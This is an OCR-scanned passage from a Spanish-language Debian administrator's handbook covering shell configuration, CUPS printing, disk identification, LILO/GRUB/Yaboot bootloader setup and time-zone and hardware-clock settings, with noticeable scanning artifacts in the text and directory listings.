usuario  root  y  los  miembros  del  grupo  audio.  Solo  estos  usuarios  pueden  trabajar 
con  el  mezclador  de  audio. 

Es  importante  saber  que  la  combinacion  de  udev,  consolekit  y  policykit  pueden 
agregar  permisos  adicionales  que  le  permite  a  usuarios  conectados  ffsicamente  a 
una  consola  (no  a  traves  de  la  red)  acceder  a  ciertos  dispositivos. 


8.6.  Entorno  de  consola 

Los  interpretes  de  ordenes  (o  consolas)  pueden  ser  el  primer  punto  de  contacto  de  un  usuario 
con  el  equipo  y,  por  lo  tanto,  deben  ser  suficientemente  amigables.  La  mayorfa  utiliza  scripts  de 
inicializacion  que  permiten  configurar  su  comportamiento  (completado  automatico,  texto  del 
prompt,  etc.). 

bash,  la  consola  estandar,  utiliza  el  script  de  inicializacion  /etc/bash  .  bashre  para  consolas 
interactivasy  /etc/profile  para  consolas  de  «inicio  de  sesion». 
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VOLVER  A  LOS  CIMIENTOS 

Consola  de  inicio  de 
sesion  y  consola  (no) 
interactiva 


En  terminos  simples,  se  invoca  una  consola  de  inicio  de  sesion  al  iniciar  sesion  en 
una  consola  local  o  remotamente  utilizando  ssh  o  explicitamente  cuando  ejecuta 
bash  -  -login.  Independientemente  de  si  es  una  consola  de  inicio  de  sesion  o  no, 
esta  puede  ser  interactiva  (por  ejemplo  en  un  terminal  de  tipo  xterm)  o  no  interac¬ 
tiva  (como  cuando  se  ejecuta  un  script). 


DESCUBRIMIENTO 

Otras  consolas,  otros 
scripts 


Cada  interprete  de  ordenes  tiene  una  sintaxis  especifica  y  sus  propios  archivos  de 
configuracion.  Por  lo  tanto,  zsh  utiliza  /etc/zshrc  y  /etc/zshenv;  csh  utiliza 
/etc/cshrc,  /etc/csh .  login  y  /etc/csh  .  logout.  Las  paginas  de  manual  para 
estos  programas  documentan  los  archivos  que  utilizan. 


En  bash  es  util  activar  el  «completado  automatico»  en  el  archivo  /etc/bash  .  bash  re  (simple- 
mente  descomente  unas  pocas  lineas). 


VOLVER  A  LOS  CIMIENTOS  Muchos  interpretes  de  ordenes  proveen  funcionalidad  de  completado  que  le  per- 
Completado  automatico  mite  a  la  consola  completar  automaticamente  el  nombre  de  una  orden  ingresada 

parcialmente  cuando  el  usuario  pulsa  la  tecla  Tab.  Esto  le  permite  al  usuario  traba- 
jar  mas  eficientemente  y  evitar  errores. 

Esta  funcionalidad  es  muy  potente  y  flexible.  Es  posible  configurar  su  comporta- 
miento  segun  cada  programa.  Por  lo  tanto,  el  primer  parametro  que  sigue  a  apt- 
get  sera  propuesto  segun  la  sintaxis  del  mismo,  aun  si  no  coincide  con  ningun  ar¬ 
chivo  (en  este  caso  las  opciones  posibles  son  install,  remove,  upgrade,  etc.). 


VOLVER  A  LOS  CIMIENTOS  La  virgulilla  se  utiliza  generalmente  para  indicar  el  directorio  al  que  apunta  la  va- 
La  virgulilla  un  atajo  a  riable  de  entorno  HOME  (este  es,  el  directorio  personal  del  usuario,  como  /home/ 
HOME  rhertzog/).  Los  interpretes  de  ordenes  realizan  la  substitucion  automaticamente: 
-/hello .  txt  se  con  vert  ira  en  /home/ rhertzog/ hello .  txt. 

La  virgulilla  tambien  permite  acceder  al  directorio  personal  de  otro  usuario.  -rmas/ 
hola .  txt  es  sinonimo  de  /home/ rmas/ hola  .txt. 


Ademas  de  estos  scripts  comunes,  cada  usuario  puede  crear  -/ .  bashrey  -/ .  bash_profile  pa¬ 
ra  configurar  su  consola.  Los  cambios  mas  comunes  son  el  agregado  de  alias,  palabras  que  son 
reemplazadas  automaticamente  con  la  ejecucion  de  una  orden  haciendo  mas  facil  su  ejecucion. 
Por  ejemplo,  podria  crear  el  alias  la  para  la  orden  Is  -la  |  less;  entonces  solo  tendra  que 
ejecutar  la  para  inspeccionar  en  detalle  el  contenido  de  un  directorio. 


VOLVER  A  LOS  CIMIENTOS  Las  variables  de  entorno  permiten  almacenar  configuraciones  globales  para  la  con- 
Variables  de  entorno  s°la  u  °tros  programas  ejecutados.  Son  contextuales  (cada  proceso  tiene  su  propio 
conjunto  de  variables  de  entorno)  pero  heredables.  Esta  ultima  caracteristica  ofre- 
ce  la  posibilidad  a  una  consola  de  inicio  de  sesion  de  declarar  variables  que  seran 
pasadas  a  todos  los  programas  que  ejecute. 


Definir  las  variables  de  entorno  predeterminadas  es  un  elemento  importante  en  la  configuracion 
de  una  consola.  Dejando  de  lado  las  variables  especificas  a  cada  consola,  es  preferible  definirlas 
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en  el  archivo  /etc/environment  ya  que  es  utilizado  por  los  varios  programas  que  podrfan  ini- 
ciar  una  sesion  en  consola.  Las  variables  all!  definidas  usualmente  incluyen  ORGANIZATION  que 
generalmente  contiene  el  nombre  de  la  empresa  u  organization  y  HTTP_PROXY  que  indica  la 
existencia  y  ubicacion  de  un  proxy  HTTP. 


SUGERENCIA  Los  usuarios  generalmente  desean  configurar  sus  consolas  de  sesion  e  interactivas 
Configuracion  identica  de  m'srna  forma.  Para  lograrlo,  eligen  interpretar  (utilizando  la  orden  «source») 

en  todas  las  consolas  contenido  del  archivo  -/ .  bashrc  desde  el  archivo  -/ .  bash  profile.  Es  posible 
hacer  lo  mismo  con  archivos  comunes  a  todos  los  usuarios  (ejecutando  /etc/bash  . 
bashrc  desde  /etc/profile). 


8.7.  Configuracion  de  impresoras 

La  configuracion  de  impresion  solia  causar  dolores  de  cabeza  tanto  a  administradores  como  a 
usuarios.  Estos  problemas  son  ahora  algo  del  pasado  gracias  a  cups,  el  servidor  de  impresion  libre 
que  utiliza  el  protocolo  IPP  (protocolo  de  impresion  de  internet:  «Internet  Printing  Protocol»). 

Este  programa  esta  dividido  en  varios  paquetes  Debian:  cups  es  el  servidor  de  impresion  central; 
cups-bsd  es  una  capa  de  compatibilidad  que  permite  utilizar  los  programas  del  sistema  de  impre¬ 
sion  BSD  tradicional  (el  demonio  Lpd,  los  programas  Ipry  Ipq,  etc.);  cups-client  que  contiene  un 
grupo  de  programas  para  interactuar  con  el  servidor  (bloquear  o  desbloquear  una  impresora, 
ver  o  eliminar  trabajos  de  impresion  en  curso,  etc.);  y  por  ultimo  cups-driver-gutenprint  contiene 
una  coleccion  de  controladores  de  impresion  adicionales  para  cups. 


COMUNIDAD  CUPS  (sistema  Unix  comun  de  impresion:  «Common  Unix  Printing  System»)  es  un 
CUPS  proyecto  (y  una  marca  registrada)  gestionado  por  Apple,  Inc. 

»•  http://www.cups.org/ 


Luego  de  instalar  estos  paquetes,  puede  administrar  cups  facilmente  a  traves  de  una  interfaz 
web  en  la  direccion  local:  http://localhost:631/.  Alii  podra  agregar  impresoras  (incluyendo  im¬ 
presoras  de  red),  eliminarlas  y  administrarlas.  Tambien  puede  administrar  cups  con  la  interfaz 
grafica  proporcionada  por  el  entorno  de  escritorio.  Por  utltimo  existe  tambien  la  orden  de  in- 
terprete  grafica  system -con  fig -printer  (en  el  paquete  de  Debian  homonimo). 


NOTA  cups  ya  no  utiliza  el  archivo  /etc/printcap  que  ahora  es  obsoleto.  Los  programas 
Obsolescencia  de  /etc/  tlue  necesitan  este  archivo  para  obtener  una  lista  de  impresoras  disponibles,  por 
printcap  tant°>  fallaran.  Para  evitar  este  problema  elimine  este  archivo  y  cree  un  enlace 
simbolico  (revise  el  recuadro  «Enlaces  simbolicos»  pagina  178)  a  /var/ run/cups/ 
printcap  que  cups  mantiene  para  asegurar  la  compatibilidad. 
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8.8.  Configuration  del  gestor  de  arranque 


Probablemente  ya  este  funcionando,  pero  siempre  es  bueno  saber  como  configurar  e  instalar 
el  gestor  de  arranque  en  caso  que  desaparezca  del  registro  maestro  de  arranque  («Master  Boot 
Record»).  Esto  puede  ocurrir  luego  de  la  instalacion  de  otro  sistema  operativo  como  Windows. 
La  informacion  a  continuation  tambien  puede  ayudarle  a  modificar  la  configuration  del  gestor 
de  arranque  si  lo  necesita. 


VOLVER  A  LOS  CIMIENTOS 

Registro  maestro  de 
arranque  («Master  boot 
record») 


El  registro  maestro  de  arranque  (MBR:  «Master  Boot  Record*)  ocupa  los  primeros 
512  bytes  del  primer  disco  duro  y  es  lo  primero  que  carga  el  BIOS  para  otorgar  el 
control  a  un  programa  capaz  de  iniciar  el  sistema  operativo  deseado.  En  general,  se 
instala  el  gestor  de  arranque  en  el  MBR  eliminando  su  contenido  anterior. 


8.8.1.  Identification  de  discos 


CULTURA  El  directorio  /dev/  tradicionalmente  almacena  los  llamados  archivos  «especiales» 
udev  y  /dev/  con  °bjetivo  de  representar  los  perifericos  del  sistema  (revise  el  recuadro  «Per- 
misos  de  acceso  a  dispositivos*  pagina  169).  Originalmente,  solia  contener  todos 
los  archivos  especiales  que  podrian  llegar  a  utilizarse.  Este  enfoque  acarreaba  al- 
gunas  desventajas,  entre  las  que  se  encontraba  el  hecho  que  restringfa  la  cantidad 
de  dispositivos  que  podiamos  utilizar  (debido  a  la  lista  estatica  de  nombres)  y  era 
imposible  saber  cuales  archivos  especiales  eran  realmente  utiles. 

Hoy  en  dfa,  la  gestion  de  archivos  especiales  es  completamente  dinamica  y  mas 
acorde  a  la  naturaleza  de  los  dispositivos  electronicos  que  pueden  conectarse  y 
desconectarse  en  caliente.  El  nucleo  coopera  con  udev  para  crearlos  y  eliminarlos 
segun  sea  necesario  cuando  aparecen  y  desaparecen  los  dispositivos  correspondien- 
tes.  Por  esta  razon,  /dev/  no  necesita  ser  persistente  y  es  un  sistema  de  archivos 
basado  en  RAM  que  comienza  vacio  y  solo  contiene  los  elementos  relevantes. 

El  nucleo  comunica  mucha  informacion  sobre  los  dispositivos  agregados  reciente- 
mente  y  provee  un  par  de  numeros  mayor/menor  para  identificarlo.  Con  esta  infor¬ 
macion,  udevd  puede  crear  un  archivo  especial  con  el  nombre  y  los  permisos  que 
desee.  Tambien  puede  crear  alias  y  llevar  a  cabo  acciones  adicionales  (por  ejemplo 
las  tareas  de  inicializacion  o  registro).  El  comportamiento  de  udevd  es  controlado 
por  un  gran  conjunto  de  reglas  (personalizables). 

Utilizando  nombres  asignados  dinamicamente,  puede  mantener  el  mismo  nombre 
para  un  dispositivo  dado  sin  importar  el  conector  que  utilice  o  el  orden  en  que  lo 
haga,  algo  particularmente  util  cuando  utiliza  varios  perifericos  USB.  Puede  llamar 
la  primera  particion  del  primer  disco  dura  /dev/sdal  por  cuestiones  de  compatibi- 
lidad,  /dev/ root-  partition  si  lo  prefiere  o  inclusive  ambos  simultaneamente  ya 
que  puede  configurar  udevd  para  que  cree  un  enlace  simbolico  automaticamente. 

Antiguamente  se  cargaban  automaticamente  algunos  modulos  del  nucleo  cuando 
intentaba  acceder  al  archivo  de  dispositivo  correspondiente.  Ahora  no  es  el  caso  y  el 
archivo  especial  del  dispositivo  ya  no  existe  antes  de  cargar  el  modulo;  no  represen- 
ta  ningun  problema  ya  que  la  mayorfa  de  los  modulos  se  cargan  durante  el  arranque 
gracias  a  la  deteccion  automatica  de  hardware.  Sin  embargo  esto  no  funciona  pa¬ 
ra  perifericos  no  detectables  (como  discos  antiguos  o  perifericos  PS/2).  Considere 
agregar  los  modulos  floppy,  psmouse  y  mousedev  al  archivo  /etc/modules  para 
forzar  que  se  carguen  dichos  modulos  durante  el  arranque. 
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La  configuracion  del  gestor  de  arranque  debe  identificar  los  diferentes  discos  duros  y  sus  par- 
ticiones.  Linux  utiliza  archivos  especiales  de  «bloque»  almacenados  en  el  directorio  /dev/.  A 
partir  de  Debian  Squeeze  se  ha  unificado  el  esquema  de  nombres  para  los  discos  duros  en  el  nu- 
cleo  Linux  y  todos  los  discos  duros  (IDE/PATA,  SATA,  SCSI,  USB,  IEEE  1394)  son  representados 
con  /dev/sd*. 

Se  representa  cada  particion  por  su  numero  en  el  disco  en  el  que  existe:  por  ejemplo,  /dev/sdal 
es  la  primera  particion  del  primer  disco y  /dev/sdb3  es  la  tercera  particion  del  segundo  disco. 

La  arquitectura  de  PC  (o  «i386»,  incluyendo  tambien  la  ”amd64”  )  ha  venido  estando  limitada  a 
utilizar  el  formato  de  tabla  de  particiones  ’’MS-DOS”,  que  solo  permite  cuatro  particiones  «pri- 
marias»  por  disco.  Para  superar  esta  limitacion,  bajo  este  esquema  una  de  ellas  debe  ser  creada 
como  una  particion  «extendida»  y  esta  luego  puede  contener  varias  particiones  «secundarias» 
(N.T.  la  denominacion  tradicional,  al  menos  en  Espana  es  «unidades  logicas»)  adicionales.  Estas 
particiones  secundarias  se  numeran  a  partir  del  5.  Por  lo  tanto,  la  primera  particion  secundaria 
seria  /dev/sda5  seguida  de  /dev/sda6,  etc. 

Otra  restriccion  del  formato  de  la  tabla  de  particiones  de  MS-DOS  es  que  solo  permite  discos  de 
hasta  2  TiB  de  tamano,  lo  cual  esta  comenzando  a  ser  un  problema  real  con  los  discos  recientes. 

Un  nuevo  formato  de  tabla  de  particiones,  llamado  GPT  relaja  estas  restricciones  sobre  el  nume¬ 
ro  de  particiones  (permite  hasta  128  particiones  utilizando  los  ajustes  predeterminados)  y  sobre 
el  tamano  de  los  discos  (hasta  8  ZiB,  que  es  mas  de  8  billones  de  terabytes).  Si  se  pretenden  crear 
muchas  particiones  fisicas  en  el  mismo  disco  deberia  utilizarse  el  formato  GPT  para  particionar 
el  disco. 

No  siempre  es  sencillo  recordar  que  disco  esta  conectado  a  que  controlador  SATA  o  esta  en  la 
tercera  posicion  de  la  cadena  SCSI,  especialmente  desde  que  el  nombre  de  los  discos  duros  remo- 
vibles  (que  incluye,  entre  otros,  la  mayoria  de  los  discos  SATA  y  discos  externos)  puede  cambiar 
de  un  inicio  a  otro.  Afortunadamente  udev  crea,  ademas  de  /dev/sd*,  enlaces  simbolicos  con 
nombres  fijos  que  puede  utilizar  si  lo  desea  para  identificar  un  disco  duro  de  forma  univoca. 
Estos  enlaces  simbolicos  son  almacenados  en  /dev/disk/by- id.  En  un  equipo  con  dos  discos 
fisicos,  por  ejemplo,  uno  podria  encontrar  lo  siguiente: 


mirexpress : 

/dev/disk/by 

-id#  Is  -1 

total  0 

1  rwx  rwx  rwx 

1 

root 

root 

9 

23 

jul. 

08:58 

ata-STM3500418AS_9VM3L3KP  ->  ../../sda 

1  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

08:58 

ata-STM3500418AS_9VM3L3KP-partl  ->  . ./../sdal 

1  rwx  rwx  rwx 

r  i 

1 

root 

root 

10 

23 

jul. 

08:58 

at a  - STM3500418AS9VM3L3KP -  pa  rt2  ->  . ,/../sda2 

1  rwx  rwx  rwx 

1 

root 

root 

9 

23 

jul. 

08:58 

ata - WDCWD5001AALS - 00L3B2  WD - WCAT00241697  -> 

**  .  ./. 

,/sdb 

1  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

08:58 

ata - WDCWD5001AALS - 00L3B2  WD - WCAT00241697 - 

parti 

->  .  , 

,/. ./sdbl 

1  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

08:58 

ata -WDCWD5001AALS - 00L3B2WD - WCAT00241697 - 

part2 

r  l 

->  .  , 

,/. ./sdb2 

L  ■  ■  ■  J 

l  rwx  rwx  rwx 

1 

root 

root 

9 

23 

jul. 

08:58 

scsi-SATA  STM3500418AS9VM3L3KP  ->  ../../sda 
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l  rwx  rwx  rwx 

i 

root 

root 

O 

rH 

23 

jul. 

08:58 

scsi 

-SATA 

STM3500418AS  9VM3L3KP -  pa  rt 1  -> 

.  ./. 

,/sdal 

1  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

08:58 

scsi 

-SATA 

STM3500418AS  9VM3L3KP- pa rt2  -> 

r  i 

,/sda2 

L  ■  ■  ■  J 

l  rwx  rwx  rwx 

1 

root 

root 

9 

23 

jul. 

08:58 

scsi 

-SATA 

WDCWD5001AALS -  WD - WCAT00241697  -> 

,/sdb 

1  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

08:58 

scsi 

-SATA 

WDCWD5001AALS -  WD - WCAT00241697 - 

parti 

->  .  . 

/. ,/sdbl 

l  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

08:58 

scsi 

-SATA 

WDCWD5001AALS -  WD - WCAT00241697 - 

part2 

r  l 

->  .  . 

/. ,/sdb2 

L  ■  ■  ■  J 

l  rwx  rwx  rwx 

1 

root 

root 

9 

23 

jul. 

16:48 

usb- 

LaCie 

iamaKey  3ed00e26ccclla-0 : 0  -> 

,/sdc 

1  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

16:48 

usb- 

LaCie 

iamaKey  3ed00e26ccclla-0 : 0-partl  -> 

.  ./ 

.  /sdcl 

1  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

16:48 

usb- 

LaCie 

iamaKey  3ed00e26ccclla-0 : 0-part2  -> 

.  ./ 

r  1 

.  /sdc2 

L  ■  ■  ■  J 

l  rwx  rwx  rwx 

1 

root 

root 

9 

23 

jul. 

08:58 

wwn  - 

0x5000c50015c4842f  ->  ../../sda 

l  rwx  rwx  rwx 

1 

root 

root 

10 

23 

jul. 

08:58 

wwn  - 

0x5000c50015c4842f -parti  ->  ../../sdal 

[...] 

mirexpress : /dev/disk/by- id# 


Es  importante  notar  que  algunos  discos  aparecen  varias  veces  (porque  se  comportan  como  dis¬ 
cos  ATA  asi  tambien  como  discos  SCSI),  pero  la  informacion  relevante  es  principalmente  en  el 
modelo  y  numero  serie  del  disco  con  los  que  puede  encontrar  el  archivo  del  periferico. 

Los  archivos  de  configuracion  de  ejemplo  provistos  en  las  proximas  secciones  estanbasados  en 
la  misma  instalacion:  un  unico  disco  SATA  donde  la  primera  particion  es  una  antigua  instalacion 
de  Windows  y  la  segunda  contiene  Debian  GNU/Linux. 


8.8.2  Configuracion  de  LILO 


LILO  (cargador  de  Linux:  «LInux  LOader»)  es  el  gestor  de  arranque  mas  antiguo  —  solido  pero 
rustico.  Escribe  la  direccion  fisica  del  nucleo  a  inciar  en  el  MBR,  razon  por  la  que  debe  seguir 
cada  actualizacion  de  LILO  (o  su  archivo  de  configuracion)  con  una  ejecucion  de  lilo.  Olvidarlo 
hara  que  el  sistema  no  pueda  iniciar  si  se  elimino  o  reemplazo  el  nucleo  antiguo  ya  que  el  nuevo 
no  estara  en  la  misma  ubicacion  en  el  disco. 

El  archivo  de  configuracion  de  LILO  es  /etc/ lilo .  conf;  se  muestra  en  el  ejemplo  a  continuacion 
un  archivo  simple  con  la  configuracion  estandar. 
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Ejemplo  8.3  Archivo  de  configuration  de  LILO 


#  El  disco  en  el  que  instalar  LILO 

#  Indicar  un  disco  en  lugar  de  una  particion 

#  instalara  LILO  en  el  MBR. 
boot=/dev/sda 

#  la  particion  que  contiene  Debian 
root=/dev/sda2 

#  el  elemento  a  cargar  de  forma  predeterminada 
default=Linux 

#  la  imagen  de  nucleo  mas  reciente 
image=/vmlinuz 

label=Linux 

init rd=/init  rd . img 

read-only 

#  Nucleo  antiguo  (si  el  recientemente  instalado  no  inicia) 
image=/vmlinuz . old 

label=LinuxOLD 

init rd=/init  rd . img . old 

read-only 

optional 

#  solo  para  inicio  dual  Linux/Windows 
other=/dev/sdal 

label=Windows 


8.8.3  Configuracion  de  GRUB  2 


GRUB  (gran  gestor  de  arranque  unificado:  «GRand  Unified  Bootloader»)  es  mas  reciente.  No  es 
necesario  ejecutarlo  luego  de  cada  actualizacion  del  nucleo,  GRUB  sabe  como  leer  los  sistemas 
de  archivos  y  encontrar  la  ubicacion  del  nucleo  en  el  disco  por  su  cuenta.  Para  instalarlo  en  el 
MBR  del  primer  disco  simplemente  ejecute  grub- install  /dev/sda. 
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NOTA  GRUB  solo  puede  identificar  discos  duros  basandose  en  la  informacion  provis- 
Nombres  de  disco  para  *a  Por  BIOS.  (hd0)  corresponde  al  primer  disco  detectado,  (hdl)  al  segun- 
GRUB  do,  etc.  En  la  mayoria  de  los  casos  este  orden  se  corresponde  exactamente  con 
el  orden  usual  de  discos  bajo  Linux,  pero  puede  ocurrir  problemas  cuando  aso- 
cie  discos  IDE  y  SCSI.  GRUB  almacena  las  correspondencias  que  detecta  en  el 
archivo  /boot/grub/device. map.  Si  encuentra  errores  alii  (porque  sabe  que  su 
BIOS  detecta  dispositivos  en  un  orden  diferente),  corrljalo  manualmente  y  ejecute 
grub-install  nuevamente.  grub-mkdevicemap  puede  ayudar  a  crear  un  archivo 
device. map  a  partir  del  cual  comenzar. 

Las  particiones  tambien  tienen  nombres  especificos  en  GRUB.  Cuando  utilice  par- 
ticiones  «clasicas»  en  el  formato  MS-DOS,  la  primera  particion  en  el  primer  disco 
corresponded  con  la  etiqueta  (hd0,  msdosl),  la  segunda  con  (hd0,msdos2),  etc. 


La  configuracion  de  GRUB2  esta  almacenada  en  /boot/grub/grub,  cfg,  pero  este  archivo  (en 
Debian)  es  generado  a  partir  de  otros.  Tenga  cuidado  de  no  modificarlo  a  mano  ya  que  perdera  di- 
chas  configuraciones  locales  la  proxima  vez  que  se  ejecute  update -  grub  (que  puede  ocurrir  al  ac- 
tualizar  algunos  paquetes).  Las  modificaciones  mas  comunes  del  archivo  /boot/g  rub/g  rub .  cfg 
(agregar  parametros  al  nucleo  o  cambiar  el  tiempo  que  se  mostrara  el  menu  por  ejemplo)  se 
realizan  a  traves  de  variables  en  /etc/default/grub.  Para  agregar  elementos  al  menu  puede 
crear  un  archivo  /boot/g  rub/custom .  cf  g  o  modificar  el  archivo  /etc/g  rub .  d/50_custom.  Pa¬ 
ra  configuraciones  mas  complejas  puede  modificar  otros  archivos  en  /etc/g rub. d  o  crearlos; 
estos  scripts  deben  devolver  porciones  de  configuracion,  posiblemente  utilizando  programas 
externos.  Estos  scripts  son  los  que  actualizaran  la  lista  de  nucleos  a  iniciar:  10_linux  tiene  en 
cuenta  los  nucleos  Linux  instalados;  20_linux_xen  tiene  en  cuenta  sistemas  virtuales  Xen  y 
30_os-  prober  listara  otros  sistemas  operativos  (Windows,  OS  X,  Hurd). 


8.8.4  Para  equipos  Macintosh  (PowerPC):  configuracion  de  Yaboot 


Yaboot  es  el  gestor  de  arranque  utilizado  por  equipos  Macintosh  antiguos  que  utilizan  procesa- 
dores  PowerPC.  No  arrancan  como  PCs  sino  que  necesitan  una  particion  de  arranque  desde  la 
que  el  BIOS  (u  OpenFirmware)  ejecuta  el  gestor  y  en  la  que  el  programa  ybin  instala  yaboot  y 
su  achivo  de  configuracion.  Solo  necesitara  ejecutar  este  programa  nuevamente  si  se  modifica 
/etc/yaboot .  conf  (se  lo  duplica  en  la  particion  de  arranque  y  yaboot  sabe  como  encontrar  la 
posicion  de  los  nucleos  en  el  disco). 

Antes  de  ejecutar  ybin  primero  debe  tener  un  archivo  /etc/yaboot .  conf  valido.  Lo  que  sigue 
es  un  ejemplo  de  configuracion  minimo. 
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Ejemplo  8.4  Archivo  de  configuration  de  Yaboot 


#  particion  de  arranque 
boot=/dev/sda2 

#  el  disco 
device=hd : 

#  la  particion  Linux 
partition=3 
root=/dev/sda3 

#  arrancar  luego  de  3  segundos  de  inactividad 

#  (timeout  es  en  decimas  de  segundo) 
timeout=30 

in st all=/usr/lib/yaboot /yaboot 
magicboot=/usr/lib/yaboot/of boot 
enablecdboot 

#  ultimo  nucleo  instalado 
image=/vmlinux 

label=linux 

init rd=/init  rd . img 

read-only 

#  nucleo  antiguo 
image=/vmlinux . old 

label=old 

init rd=/init  rd . img . old 
read-only 

#  solo  para  arranque  dual  Linux/Mac  OSX 
macosx=/dev/sda5 

#  tambien  son  validos 

#  bsd=/dev/sdaX  y  macos=/dev/sdaX 


8.9.  Otras  configuraciones:  sincronizacion  de  tiempo,  registros,  acceso 
compartido... 


Es  recomendable  que  cualquiera  que  quiera  dominar  todos  los  aspectos  de  configuracion  de  un 
sistema  GNU/Linux  conozca  los  muchos  elementos  incluidos  en  esta  seccion.  Se  los  trata,  sin 
embargo,  brevemente  y  generalmente  lo  dirigiran  a  la  documentacion. 
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8.9.1  Zona  horaria 


VOLVER  A  LOS  CIMIENTOS 

Un  enlace  simbolico  es  un  puntero  a  otro  archivo.  Cuando  accede  al  mismo,  abre  el 

Enlaces  simbolicos 

archivo  al  que  apunta.  Eliminar  el  enlace  no  causara  la  eliminacion  del  archivo  al 
que  apunta.  Asf  mismo,  no  tiene  su  propio  conjunto  de  permisos  sino  que  retiene 
los  permisos  del  archivo  al  que  apunta.  Finalmente,  puede  apuntar  a  cualquier  tipo 
de  archivo:  directorios,  archivos  especiales  (zocalos,  tuberfas  con  nombres,  archivos 
de  dispositivo,  etc.),  inclusive  otros  enlaces  simbolicos. 

Laordenln  -s  objetivo  norrbre  del  enlace  crea  un  enlace  simbolico  llamado 
nombre_del_enla.ee  y  que  apunta  a  objetivo. 

Si  el  objetivo  no  existe  entonces  el  enlace  esta  «roto»  y  accederlo  resultara  en  un 
error  indicando  que  el  archivo  objetivo  no  existe.  Si  el  enlace  apunta  a  otro  enlace, 
tendra  una  «cadena»  de  enlaces  que  se  convertira  en  un  «ciclo»  si  alguno  de  ellos 
apunta  a  uno  de  sus  predecesores.  En  este  caso,  acceder  a  uno  de  los  enlaces  en 
el  ciclo  resultara  en  un  error  especifico  (demasiados  niveles  de  enlaces  simbolicos: 
«too  many  levels  of  symbolic  links*);  esto  significa  que  el  nucleo  se  rindio  luego  de 
varias  vueltas  en  el  ciclo. 

La  zona  horaria,  configurada  durante  la  instalacion  inicial,  es  un  elemento  de  configuracion 
del  paquete  tzdata.  Para  modificarla  ejecute  dpkg-  reconfigure  tzdata,  lo  que  le  permitira 
seleccionar  de  forma  interactiva  la  zona  horaria  a  utiliza.  Se  almacena  su  configuracion  en 
el  archivo  /etc/timezone.  Ademas,  se  copiara  el  archivo  correspondiente  en  el  directorio 
/usr/share/zoneinfo  a  /etc/localtime;  este  archivo  contiene  las  reglas  sobre  las  fechas  a 
las  que  corresponde  el  horario  de  verano  en  los  paises  que  lo  utilizan. 

Cuando  necesite  cambiar  la  zona  horaria  temporalmente  utilice  la  variable  de  entorno  TZ  que 
tiene  mas  prioridad  que  la  configurada  en  el  sistema: 

$  date 

Thu  Feb  19  11:25:18  CET  2015 
$  TZ="Pacific/Honolulu”  date 

Thu  Feb  19  00:25:21  HST  2015 


NOTA  Existen  dos  fuentes  de  tiempo  en  un  equipo.  La  placa  madre  tiene  un  reloj  de  hard- 

Reloj  de  sistema  reloj  de  ware  llamado  «reloj  CMOS».  Este  reloj  no  es  muy  preciso  y  provee  tiempos  de 

hardware  acceso  bastante  lentos.  El  nucleo  del  sistema  operativo  tiene  el  suyo  propio,  el  re¬ 
loj  de  software,  que  mantiene  actualizado  a  su  manera  (posiblemente  con  ayuda 
de  servidores  de  tiempo,  revise  la  seccion  Seccion  8.9.2,  «Sincronizacion  de  tiem¬ 
po*  pagina  179).  El  reloj  del  sistema  generalmente  es  mas  preciso,  especialmente 
debido  a  que  no  necesita  acceso  a  variables  de  hardware.  Sin  embargo,  como  solo 
existe  en  memoria,  es  eliminado  cada  vez  que  inicia  la  maquina  a  diferencia  del  reloj 
CMOS  que  tiene  una  bateria  y,  por  lo  tanto,  «sobrevive»  reinicios  de  la  maquina  o 
cuando  esta  apagada.  Por  lo  tanto,  el  reloj  de  sistema  es  configurado  desde  el  reloj 
CMOS  durante  el  inicio  y  el  reloj  CMOS  es  actualizado  al  apagar  (para  tener  en 
cuenta  posibles  cambios  o  correcciones  si  no  se  ajusto  correctamente). 
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En  la  practica  hay  un  problema,  ya  que  el  reloj  CMOS  no  es  nada  mas  que  un  con- 
tador  no  contiene  informacion  sobre  la  zona  horaria.  Hay  una  eleccion  a  realizar 
sobre  su  interpretacion:  o  bien  el  sistema  considera  que  esta  en  tiempo  universal 
(UTC,  anteriormente  GMT)  o  en  horario  local.  Esta  eleccion  podria  ser  un  cambio 
simple  pero  las  cosas  son  en  realidad  un  poco  mas  complicadas:  como  resultado  del 
horario  de  verano,  el  desfasaje  puede  no  ser  constante.  El  resultado  es  que  el  siste¬ 
ma  no  tiene  forma  de  saber  si  este  es  correcto,  especialmente  alrededor  de  perfodos 
de  cambios  de  hora.  Debido  a  que  siempre  es  posible  reconstruir  la  hora  local  des- 
de  tiempo  universal  y  la  informacion  de  zona  horaria  recomendamos  fuertemente 
utilizar  el  reloj  CMOS  en  tiempo  universal. 

Desafortunadamente,  los  sistemas  Windows  en  su  configuracion  predetermina- 
da  ignoran  esta  recomendacion;  mantienen  el  reloj  CMOS  en  tiempo  local  apli- 
cando  cambios  al  iniciar  el  equipo  intentando  adivinar  durante  los  tiempos  de 
cambio  si  el  cambio  ya  fue  aplicado  o  no.  Esto  funciona  relativamente  bien  siem¬ 
pre  y  cuando  el  sistema  solo  ejecute  Windows.  Pero  cuando  un  equipo  tiene 
varios  sistemas  (ya  sea  una  configuracion  de  «inicio  dual»  o  la  ejecucion  de 
los  mismos  en  maquinas  virtuales),  se  desata  el  caos  siendo  imposible  determi- 
nar  la  hora  correcta.  Si  debe  mantener  obligatoriamente  Windows  en  un  equi¬ 
po  o  bien  deberia  configurarlo  para  mantener  el  reloj  CMOS  en  UTC  (definien- 
do  la  clave  de  registro  DWORD  HKLM\SYSTEM\CurrentControlSet\Control\ 
TimeZoneInformation\RealTimeIsUniversal  como  «1»)  o  ejecutar  hwclock  - 
-localtime  --set  para  modificar  la  hora  del  reloj  en  hardware  e  indicarle  que 
se  encuentra  en  hora  local  (debera  asegurarse  de  revisar  manualmente  su  reloj  en 
primavera  y  otono). 


8.9.2  Sincronizacion  de  tiempo 


VOLVER  A  LOS  CIMIENTOS  NTP  (protocolo  de  tiempo  de  red:  «Network  Time  Protocol*)  le  permite  a  una  ma- 
NTP  quina  sincronizarse  con  otras  muy  precisamente  teniendo  en  cuenta  las  demoras 
inducidas  por  la  transferencia  de  informacion  sobre  la  red  y  otras  desviaciones  po- 
sibles. 

Si  bien  hay  numerosos  servidores  NTP  en  Internet,  los  mas  populares  tienden 
